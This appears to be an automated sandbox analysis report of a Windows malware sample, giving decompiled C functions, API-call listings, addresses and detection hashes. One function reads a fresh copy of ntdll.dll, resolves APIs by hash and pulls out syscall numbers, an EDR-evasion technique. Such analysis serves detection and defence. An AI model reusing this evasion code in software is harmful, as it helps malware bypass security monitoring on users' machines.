                                                                                0x6eee5a86
                                                                                0x6eee5a8f
                                                                                0x6eee5a90
                                                                                0x6eee5a99
                                                                                0x6eee5a9a
                                                                                0x6eee5aa3
                                                                                0x6eee5aa4
                                                                                0x6eee5aad
                                                                                0x6eee5aae
                                                                                0x6eee5ab7
                                                                                0x6eee5ab8
                                                                                0x6eee5ac1
                                                                                0x6eee5ac2
                                                                                0x6eee5acb
                                                                                0x6eee5acc
                                                                                0x6eee5ad5
                                                                                0x6eee5ad6
                                                                                0x6eee5adf
                                                                                0x6eee5ae0
                                                                                0x6eee5ae9
                                                                                0x6eee5aea
                                                                                0x6eee5af3
                                                                                0x6eee5af4
                                                                                0x6eee5afd
                                                                                0x6eee5afe
                                                                                0x6eee5b07
                                                                                0x6eee5b08
                                                                                0x6eee5b11
                                                                                0x6eee5b12
                                                                                0x6eee5b1b
                                                                                0x6eee5b1c
                                                                                0x6eee5b25
                                                                                0x6eee5b26
                                                                                0x6eee5b2f
                                                                                0x6eee5b30
                                                                                0x6eee5b39
                                                                                0x6eee5b3a
                                                                                0x6eee5b43
                                                                                0x6eee5b44
                                                                                0x6eee5b4d
                                                                                0x6eee5b4e
                                                                                0x6eee5b57
                                                                                0x6eee5b58
                                                                                0x6eee5b61
                                                                                0x6eee5b62
                                                                                0x6eee5b6b
                                                                                0x6eee5b6c
                                                                                0x6eee5b75
                                                                                0x6eee5b76
                                                                                0x6eee5b7f
                                                                                0x6eee5b80
                                                                                0x6eee5b89
                                                                                0x6eee5b8a
                                                                                0x6eee5b93
                                                                                0x6eee5b94
                                                                                0x6eee5b9d
                                                                                0x6eee5b9e
                                                                                0x6eee5ba7
                                                                                0x6eee5ba8
                                                                                0x6eee5bb1
                                                                                0x6eee5bb2
                                                                                0x6eee5bbb
                                                                                0x6eee5bbc
                                                                                0x6eee5bc5
                                                                                0x6eee5bc6
                                                                                0x6eee5bcf
                                                                                0x6eee5bd0
                                                                                0x6eee5bd9
                                                                                0x6eee5bda
                                                                                0x6eee5be3
                                                                                0x6eee5be4
                                                                                0x6eee5bed
                                                                                0x6eee5bee
                                                                                0x6eee5bf7
                                                                                0x6eee5bf8
                                                                                0x6eee5c01
                                                                                0x6eee5c02
                                                                                0x6eee5c0b
                                                                                0x6eee5c0c
                                                                                0x6eee5c15
                                                                                0x6eee5c16
                                                                                0x6eee5c1f
                                                                                0x6eee5c20
                                                                                0x6eee5c29
                                                                                0x6eee5c2a
                                                                                0x6eee5c33
                                                                                0x6eee5c34
                                                                                0x6eee5c3d
                                                                                0x6eee5c3e
                                                                                0x6eee5c47
                                                                                0x6eee5c48
                                                                                0x6eee5c51
                                                                                0x6eee5c52
                                                                                0x6eee5c5b
                                                                                0x6eee5c5c
                                                                                0x6eee5c65
                                                                                0x6eee5c66
                                                                                0x6eee5c6f
                                                                                0x6eee5c70
                                                                                0x6eee5c79
                                                                                0x6eee5c7a
                                                                                0x6eee5c83
                                                                                0x6eee5c84
                                                                                0x6eee5c8d
                                                                                0x6eee5c8e
                                                                                0x6eee5c97
                                                                                0x6eee5c98
                                                                                0x6eee5ca1
                                                                                0x6eee5ca2
                                                                                0x6eee5cab
                                                                                0x6eee5cac
                                                                                0x6eee5cb5
                                                                                0x6eee5cb6
                                                                                0x6eee5cbf
                                                                                0x6eee5cc0
                                                                                0x6eee5cc9
                                                                                0x6eee5cca
                                                                                0x6eee5cd3
                                                                                0x6eee5cd4
                                                                                0x6eee5cdd
                                                                                0x6eee5cde
                                                                                0x6eee5ce7
                                                                                0x6eee5ce8
                                                                                0x6eee5cf1
                                                                                0x6eee5cf2
                                                                                0x6eee5cfb
                                                                                0x6eee5cfc
                                                                                0x6eee5d05
                                                                                0x6eee5d06
                                                                                0x6eee5d0f
                                                                                0x6eee5d10
                                                                                0x6eee5d19
                                                                                0x6eee5d1a
                                                                                0x6eee5d23
                                                                                0x6eee5d24
                                                                                0x6eee5d2d
                                                                                0x6eee5d2e
                                                                                0x6eee5d37
                                                                                0x6eee5d38
                                                                                0x6eee5d41
                                                                                0x6eee5d42
                                                                                0x6eee5d4b
                                                                                0x6eee5d4c
                                                                                0x6eee5d55
                                                                                0x6eee5d56
                                                                                0x6eee5d5f
                                                                                0x6eee5d60
                                                                                0x6eee5d69
                                                                                0x6eee5d6a
                                                                                0x6eee5d73
                                                                                0x6eee5d74
                                                                                0x6eee5d7d
                                                                                0x6eee5d7e
                                                                                0x6eee5d87
                                                                                0x6eee5d88
                                                                                0x6eee5d91
                                                                                0x6eee5d92
                                                                                0x6eee5d9b
                                                                                0x6eee5d9c
                                                                                0x6eee5da5
                                                                                0x6eee5da6
                                                                                0x6eee5daf
                                                                                0x6eee5db0
                                                                                0x6eee5db9
                                                                                0x6eee5dba
                                                                                0x6eee5dc3
                                                                                0x6eee5dc4
                                                                                0x6eee5dcd
                                                                                0x6eee5dce
                                                                                0x6eee5dd7
                                                                                0x6eee5dd8
                                                                                0x6eee5de1
                                                                                0x6eee5de2
                                                                                0x6eee5deb
                                                                                0x6eee5dec
                                                                                0x6eee5df5
                                                                                0x6eee5df6
                                                                                0x6eee5dff
                                                                                0x6eee5e00
                                                                                0x6eee5e09
                                                                                0x6eee5e0a
                                                                                0x6eee5e13
                                                                                0x6eee5e14
                                                                                0x6eee5e1d
                                                                                0x6eee5e1e
                                                                                0x6eee5e27
                                                                                0x6eee5e28
                                                                                0x6eee5e31
                                                                                0x6eee5e32
                                                                                0x6eee5e3b
                                                                                0x6eee5e3c
                                                                                0x6eee5e45
                                                                                0x6eee5e46
                                                                                0x6eee5e4f
                                                                                0x6eee5e50
                                                                                0x6eee5e59
                                                                                0x6eee5e5a
                                                                                0x6eee5e63
                                                                                0x6eee5e64
                                                                                0x6eee5e6d
                                                                                0x6eee5e6e
                                                                                0x6eee5e77
                                                                                0x6eee5e78
                                                                                0x6eee5e81
                                                                                0x6eee5e82
                                                                                0x6eee5e8b
                                                                                0x6eee5e8c
                                                                                0x6eee5e95
                                                                                0x6eee5e96
                                                                                0x6eee5e9f
                                                                                0x6eee5ea0
                                                                                0x6eee5ea9
                                                                                0x6eee5eaa
                                                                                0x6eee5eb3
                                                                                0x6eee5eb4
                                                                                0x6eee5ebd
                                                                                0x6eee5ebe
                                                                                0x6eee5ec7
                                                                                0x6eee5ec8
                                                                                0x6eee5ed1
                                                                                0x6eee5ed2
                                                                                0x6eee5edb
                                                                                0x6eee5edc
                                                                                0x6eee5ee5
                                                                                0x6eee5ee6
                                                                                0x6eee5eef
                                                                                0x6eee5ef0
                                                                                0x6eee5ef9
                                                                                0x6eee5efa
                                                                                0x6eee5f03
                                                                                0x6eee5f04
                                                                                0x6eee5f0d
                                                                                0x6eee5f0e
                                                                                0x6eee5f17
                                                                                0x6eee5f18
                                                                                0x6eee5f21
                                                                                0x6eee5f22
                                                                                0x6eee5f2b
                                                                                0x6eee5f2c
                                                                                0x6eee5f35
                                                                                0x6eee5f36
                                                                                0x6eee5f3f
                                                                                0x6eee5f40
                                                                                0x6eee5f49
                                                                                0x6eee5f4a
                                                                                0x6eee5f53
                                                                                0x6eee5f54
                                                                                0x6eee5f5d
                                                                                0x6eee5f5e
                                                                                0x6eee5f67
                                                                                0x6eee5f68
                                                                                0x6eee5f71
                                                                                0x6eee5f72
                                                                                0x6eee5f7b
                                                                                0x6eee5f7c
                                                                                0x6eee5f85
                                                                                0x6eee5f86
                                                                                0x6eee5f8f
                                                                                0x6eee5f90
                                                                                0x6eee5f99
                                                                                0x6eee5f9a
                                                                                0x6eee5fa3
                                                                                0x6eee5fa4
                                                                                0x6eee5fad
                                                                                0x6eee5fae
                                                                                0x6eee5fb7
                                                                                0x6eee5fb8
                                                                                0x6eee5fc1
                                                                                0x6eee5fc2
                                                                                0x6eee5fcb
                                                                                0x6eee5fcc
                                                                                0x6eee5fd5
                                                                                0x6eee5fd6
                                                                                0x6eee5fdf
                                                                                0x6eee5fe0
                                                                                0x6eee5fe9
                                                                                0x6eee5fea
                                                                                0x6eee5ff3
                                                                                0x6eee5ff4
                                                                                0x6eee5ffd
                                                                                0x6eee5ffe
                                                                                0x6eee6007
                                                                                0x6eee6008
                                                                                0x6eee6011
                                                                                0x6eee6012
                                                                                0x6eee601b
                                                                                0x6eee601c
                                                                                0x6eee6025
                                                                                0x6eee6026
                                                                                0x6eee602f
                                                                                0x6eee6030
                                                                                0x6eee6039
                                                                                0x6eee603a
                                                                                0x6eee6043
                                                                                0x6eee6044
                                                                                0x6eee604d
                                                                                0x6eee604e
                                                                                0x6eee6057
                                                                                0x6eee6058
                                                                                0x6eee6061
                                                                                0x6eee6062
                                                                                0x6eee606b
                                                                                0x6eee606c
                                                                                0x6eee6075
                                                                                0x6eee6076
                                                                                0x6eee607f
                                                                                0x6eee6080
                                                                                0x6eee6089
                                                                                0x6eee608a
                                                                                0x6eee6093
                                                                                0x6eee6094
                                                                                0x6eee609d
                                                                                0x6eee609e
                                                                                0x6eee60a7
                                                                                0x6eee60a8
                                                                                0x6eee60b1
                                                                                0x6eee60b2
                                                                                0x6eee60bb
                                                                                0x6eee60bc
                                                                                0x6eee60c5
                                                                                0x6eee60c6
                                                                                0x6eee60cf
                                                                                0x6eee60d0
                                                                                0x6eee60d6
                                                                                0x6eee60d7
                                                                                0x6eee60dd
                                                                                0x6eee60de
                                                                                0x6eee60e4
                                                                                0x6eee60e5
                                                                                0x6eee60eb
                                                                                0x6eee60ec
                                                                                0x6eee60f2
                                                                                0x6eee60f3
                                                                                0x6eee60f9
                                                                                0x6eee60fa
                                                                                0x6eee6100
                                                                                0x6eee6101
                                                                                0x6eee6107
                                                                                0x6eee6108
                                                                                0x6eee610e
                                                                                0x6eee610f
                                                                                0x6eee6115
                                                                                0x6eee6116
                                                                                0x6eee611c
                                                                                0x6eee611d
                                                                                0x6eee6123
                                                                                0x6eee6124
                                                                                0x6eee612a
                                                                                0x6eee612b
                                                                                0x6eee6131
                                                                                0x6eee6132
                                                                                0x6eee6138
                                                                                0x6eee6139
                                                                                0x6eee613f
                                                                                0x6eee6140
                                                                                0x6eee6146
                                                                                0x6eee6147
                                                                                0x6eee614d
                                                                                0x6eee614e
                                                                                0x6eee6154
                                                                                0x6eee6155
                                                                                0x6eee615b
                                                                                0x6eee615c
                                                                                0x6eee6162
                                                                                0x6eee6163
                                                                                0x6eee6169
                                                                                0x6eee616a
                                                                                0x6eee6170
                                                                                0x6eee6171
                                                                                0x6eee6177
                                                                                0x6eee6178
                                                                                0x6eee617e
                                                                                0x6eee617f
                                                                                0x6eee6185
                                                                                0x6eee6186
                                                                                0x6eee618c
                                                                                0x6eee618d
                                                                                0x6eee6193
                                                                                0x6eee6194
                                                                                0x6eee619a
                                                                                0x6eee619b
                                                                                0x6eee61a1
                                                                                0x6eee61a2
                                                                                0x6eee61a8
                                                                                0x6eee61a9
                                                                                0x6eee61af
                                                                                0x6eee61b8
                                                                                0x6eee61c8
                                                                                0x6eee61d8
                                                                                0x6eee61e8
                                                                                0x6eee61fb
                                                                                0x6eee620e
                                                                                0x6eee6221
                                                                                0x6eee6234
                                                                                0x6eee6247
                                                                                0x6eee625a
                                                                                0x6eee626d
                                                                                0x6eee6280
                                                                                0x6eee6286
                                                                                0x6eee6290
                                                                                0x6eee629a
                                                                                0x6eee62a4
                                                                                0x6eee62b0
                                                                                0x6eee62bb
                                                                                0x6eee62c0
                                                                                0x6eee62c2
                                                                                0x6eee6305
                                                                                0x6eee630a
                                                                                0x6eee630d
                                                                                0x6eee6322
                                                                                0x6eee6335
                                                                                0x6eee6350
                                                                                0x6eee6356
                                                                                0x6eee635d
                                                                                0x6eee6369
                                                                                0x6eee636f
                                                                                0x6eee6372
                                                                                0x6eee6376
                                                                                0x6eee6389
                                                                                0x6eee638f
                                                                                0x6eee6392
                                                                                0x6eee6396
                                                                                0x6eee63af
                                                                                0x6eee63b5
                                                                                0x6eee63b7
                                                                                0x6eee63bd
                                                                                0x6eee63c4
                                                                                0x6eee63cc
                                                                                0x6eee63d1
                                                                                0x6eee63d3
                                                                                0x6eee63da
                                                                                0x6eee63e6
                                                                                0x6eee63f4
                                                                                0x6eee6421
                                                                                0x6eee6427
                                                                                0x6eee6429
                                                                                0x6eee642d
                                                                                0x6eee642d
                                                                                0x6eee6429
                                                                                0x6eee6432
                                                                                0x6eee6432
                                                                                0x00000000
                                                                                0x6eee63b7
                                                                                0x00000000
                                                                                0x6eee6396
                                                                                0x00000000
                                                                                0x6eee6376
                                                                                0x00000000
                                                                                0x6eee635d
                                                                                0x6eee62c6
                                                                                0x6eee62d1
                                                                                0x6eee62d6
                                                                                0x6eee62d8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee62dc
                                                                                0x6eee62e6
                                                                                0x6eee62eb
                                                                                0x6eee62ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee62f1
                                                                                0x6eee62fc
                                                                                0x6eee6301
                                                                                0x6eee6303
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                  • Part of subcall function 6EEE4211: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6EEE4256
                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EEE6350
                                                                                  • Part of subcall function 6EEE4211: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6EEE427A
                                                                                • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 6EEE6389
                                                                                  • Part of subcall function 6EEE4211: Process32NextW.KERNEL32(000000FF,0000022C), ref: 6EEE42A5
                                                                                • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 6EEE63AF
                                                                                • ExitProcess.KERNEL32(00000000), ref: 6EEE6432
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                • String ID: c7708126811449509a4aa30ceb170932
                                                                                • API String ID: 1567874941-4047853548
                                                                                • Opcode ID: f65c6a2d9955ba9a8ed14ab7800063b9e242a2ebd9d48c2c394516932662dbbd
                                                                                • Instruction ID: 69c7331c60144f001272b3c480c21a53a2b7b94706d51d8efc62cc66bc25cd6d
                                                                                • Opcode Fuzzy Hash: f65c6a2d9955ba9a8ed14ab7800063b9e242a2ebd9d48c2c394516932662dbbd
                                                                                • Instruction Fuzzy Hash: 6723A815A94798A8E7B0CB94BC26BB963756F84B10F2054C7E60CEE1E1D3B51FD09F0A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6EEE36FB, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E6EEE36FB(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void* _v76;
				intOrPtr _v80;
				signed char _v84;
				long _v88;
				short _v90;
				short _v92;
				short _v94;
				short _v96;
				short _v98;
				short _v100;
				short _v102;
				short _v104;
				short _v106;
				char _v108;
				short _t141;
				short _t142;
				short _t143;
				short _t144;
				short _t145;
				short _t146;
				short _t147;
				short _t148;
				short _t149;
				int _t165;
				signed int _t169;
				intOrPtr _t175;
				signed int _t195;
				signed int _t210;
				signed int _t222;

				_v24 = _v24 & 0x00000000;
				_v48 = _v48 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t141 = 0x6e;
				_v108 = _t141;
				_t142 = 0x74;
				_v106 = _t142;
				_t143 = 0x64;
				_v104 = _t143;
				_t144 = 0x6c;
				_v102 = _t144;
				_t145 = 0x6c;
				_v100 = _t145;
				_t146 = 0x2e;
				_v98 = _t146;
				_t147 = 0x64;
				_v96 = _t147;
				_t148 = 0x6c;
				_v94 = _t148;
				_t149 = 0x6c;
				_v92 = _t149;
				_v90 = 0;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_t23 =  &_v44;
				 *_t23 = _v44 & 0x00000000;
				_t222 =  *_t23;
				_v20 = E6EEE6B57();
				_v64 = E6EEE6BFF(_v20, 0x8a111d91);
				_v68 = E6EEE6BFF(_v20, 0x170c1ca1);
				_v52 = E6EEE6BFF(_v20, 0xa5f15738);
				_v72 = E6EEE6BFF(_v20, 0x433a3842);
				_v56 = E6EEE6BFF(_v20, 0xd6eb2188);
				_v60 = E6EEE6BFF(_v20, 0x50a26af);
				_v80 = E6EEE6BFF(_v20, 0x55e38b1f);
				_v44 = 1;
				while(1) {
					_v16 = CreateFileW(E6EEE6E07(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
					if(_v16 == 0xffffffff) {
						break;
					}
					_v36 = _v68(_v16, 0);
					__eflags = _v36 - 0xffffffff;
					if(_v36 != 0xffffffff) {
						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
						__eflags = _v12;
						if(_v12 != 0) {
							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
							__eflags = _t165;
							if(_t165 != 0) {
								_v76 = _v12;
								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
								_t213 = _v32;
								_t68 = _t169 + 0x18; // 0x8000018
								_v40 = _v32 + _t68;
								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
								__eflags = _v24;
								if(_v24 != 0) {
									E6EEE6B6F(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
									_v28 = _v28 & 0x00000000;
									while(1) {
										_t175 = _v32;
										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
											break;
										}
										E6EEE6B6F(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
										_t210 = _v28 + 1;
										__eflags = _t210;
										_v28 = _t210;
									}
									_v48 = E6EEE6BFF(_v24, _a4);
									__eflags = _v48;
									if(_v48 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											FindCloseChangeNotification(_v16);
										}
										__eflags = _v12;
										if(_v12 != 0) {
											VirtualFree(_v12, 0, 0x8000);
										}
										_v44 = _v44 & 0x00000000;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
									}
								} else {
								}
							} else {
							}
						} else {
						}
					} else {
					}
					L22:
					if(_v44 != 0) {
						if(_v16 != 0) {
							_v56(_v16);
						}
						_v80(0);
					}
					_v8 = _v48;
					while(1 != 0) {
						if(( *_v8 & 0x000000ff) != 0xb8) {
							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
							if(( *_v8 & 0x000000ff) != 0xe9) {
								__eflags = ( *_v8 & 0x000000ff) - 0xea;
								if(( *_v8 & 0x000000ff) != 0xea) {
									_t195 = _v8 + 1;
									__eflags = _t195;
									_v8 = _t195;
								} else {
									_v8 =  *(_v8 + 1);
								}
							} else {
								_t125 =  *(_v8 + 1) + 5; // 0x5
								_v8 = _v8 + _t125;
							}
							continue;
						} else {
						}
						break;
					}
					_v8 = _v8 + 1;
					_v84 =  *_v8;
					if(_v24 != 0) {
						VirtualFree(_v24, 0, 0x8000);
					}
					return _v84;
				}
				goto L22;
			}

















































                                                                                0x6eee3701
                                                                                0x6eee3705
                                                                                0x6eee3709
                                                                                0x6eee370f
                                                                                0x6eee3710
                                                                                0x6eee3716
                                                                                0x6eee3717
                                                                                0x6eee371d
                                                                                0x6eee371e
                                                                                0x6eee3724
                                                                                0x6eee3725
                                                                                0x6eee372b
                                                                                0x6eee372c
                                                                                0x6eee3732
                                                                                0x6eee3733
                                                                                0x6eee3739
                                                                                0x6eee373a
                                                                                0x6eee3740
                                                                                0x6eee3741
                                                                                0x6eee3747
                                                                                0x6eee3748
                                                                                0x6eee374e
                                                                                0x6eee3752
                                                                                0x6eee3756
                                                                                0x6eee375a
                                                                                0x6eee375e
                                                                                0x6eee375e
                                                                                0x6eee375e
                                                                                0x6eee3767
                                                                                0x6eee3777
                                                                                0x6eee3787
                                                                                0x6eee3797
                                                                                0x6eee37a7
                                                                                0x6eee37b7
                                                                                0x6eee37c7
                                                                                0x6eee37d7
                                                                                0x6eee37da
                                                                                0x6eee37e1
                                                                                0x6eee3800
                                                                                0x6eee3807
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee3816
                                                                                0x6eee3819
                                                                                0x6eee381d
                                                                                0x6eee3833
                                                                                0x6eee3836
                                                                                0x6eee383a
                                                                                0x6eee3850
                                                                                0x6eee3853
                                                                                0x6eee3855
                                                                                0x6eee385f
                                                                                0x6eee386b
                                                                                0x6eee3871
                                                                                0x6eee3875
                                                                                0x6eee3878
                                                                                0x6eee387c
                                                                                0x6eee3891
                                                                                0x6eee3894
                                                                                0x6eee3898
                                                                                0x6eee38ab
                                                                                0x6eee38b0
                                                                                0x6eee38bd
                                                                                0x6eee38bd
                                                                                0x6eee38c4
                                                                                0x6eee38c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee38f2
                                                                                0x6eee38b9
                                                                                0x6eee38b9
                                                                                0x6eee38ba
                                                                                0x6eee38ba
                                                                                0x6eee3904
                                                                                0x6eee3907
                                                                                0x6eee390b
                                                                                0x6eee390f
                                                                                0x6eee3913
                                                                                0x6eee3918
                                                                                0x6eee3918
                                                                                0x6eee391b
                                                                                0x6eee391f
                                                                                0x6eee392b
                                                                                0x6eee392b
                                                                                0x6eee392e
                                                                                0x6eee3932
                                                                                0x6eee3934
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee390d
                                                                                0x00000000
                                                                                0x6eee389a
                                                                                0x00000000
                                                                                0x6eee3857
                                                                                0x00000000
                                                                                0x6eee383c
                                                                                0x00000000
                                                                                0x6eee381f
                                                                                0x6eee393a
                                                                                0x6eee393e
                                                                                0x6eee3944
                                                                                0x6eee3949
                                                                                0x6eee3949
                                                                                0x6eee394e
                                                                                0x6eee394e
                                                                                0x6eee3954
                                                                                0x6eee3957
                                                                                0x6eee3967
                                                                                0x6eee3971
                                                                                0x6eee3976
                                                                                0x6eee3990
                                                                                0x6eee3995
                                                                                0x6eee39a5
                                                                                0x6eee39a5
                                                                                0x6eee39a6
                                                                                0x6eee3997
                                                                                0x6eee399d
                                                                                0x6eee399d
                                                                                0x6eee3978
                                                                                0x6eee3981
                                                                                0x6eee3985
                                                                                0x6eee3985
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6eee3969
                                                                                0x00000000
                                                                                0x6eee3967
                                                                                0x6eee39af
                                                                                0x6eee39b7
                                                                                0x6eee39be
                                                                                0x6eee39ca
                                                                                0x6eee39ca
                                                                                0x6eee39d3
                                                                                0x6eee39d3
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 6EEE37FD
                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 6EEE39CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644186956.000000006EEE3000.00000040.00020000.sdmp, Offset: 6EEE0000, based on PE: true
                                                                                • Associated: 00000000.00000002.644129589.000000006EEE0000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644157709.000000006EEE1000.00000080.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644176627.000000006EEE2000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644212634.000000006EEE8000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CreateFileFreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 204039940-0
                                                                                • Opcode ID: c7d3fec17d3b7065f670a1136053afef20af325ec369ec726a101209f1611919
                                                                                • Instruction ID: c2e91a5fd4c1aac038827ce5a5026234c609d0a5f0115b146cff10eafb82b908
                                                                                • Opcode Fuzzy Hash: c7d3fec17d3b7065f670a1136053afef20af325ec369ec726a101209f1611919
                                                                                • Instruction Fuzzy Hash: 98A11570D2020AEFDF00CFE8D989BEDBBB5BF08319F208459E510BA6A4D3759A41DB15
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                0x00405845
                                                                                0x00405849
                                                                                0x0040584c
                                                                                0x00405852
                                                                                0x00405856
                                                                                0x0040585a
                                                                                0x00405862
                                                                                0x00405869
                                                                                0x0040586f
                                                                                0x00405876
                                                                                0x0040587d
                                                                                0x00405885
                                                                                0x00405887
                                                                                0x00000000
                                                                                0x00405887
                                                                                0x00405891
                                                                                0x00405898
                                                                                0x004058ae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004058b0
                                                                                0x004058b4

                                                                                APIs
                                                                                • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                • GetLastError.KERNEL32 ref: 00405891
                                                                                • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                • GetLastError.KERNEL32 ref: 004058B0
                                                                                Strings
                                                                                • C:\Users\user\Desktop, xrefs: 0040583A
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                • API String ID: 3449924974-2028306314
                                                                                • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                                0x004065ff
                                                                                0x00406608
                                                                                0x0040660a
                                                                                0x0040660a
                                                                                0x0040660e
